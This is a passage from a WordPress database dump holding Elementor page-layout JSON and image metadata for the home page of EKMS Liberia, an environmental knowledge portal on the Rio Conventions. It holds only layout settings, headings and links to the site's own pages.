ings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19378,2831,'_elementor_version','2.7.5'),(19379,2831,'_elementor_template_type','wp-page'),(19380,2831,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19383,2832,'_wp_page_template','default'),(19384,2832,'_elementor_edit_mode','builder'),(19385,2832,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.61)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19386,2832,'_elementor_version','2.7.5'),(19387,2832,'_elementor_template_type','wp-page'),(19388,2832,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19409,2838,'_wp_attached_file','2019/11/gef_logo.png'),(19410,2838,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2019/11/gef_logo.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"gef_logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"gef_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19444,2849,'_wp_page_template','default'),(19445,2849,'_elementor_edit_mode','builder'),(19446,2849,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/e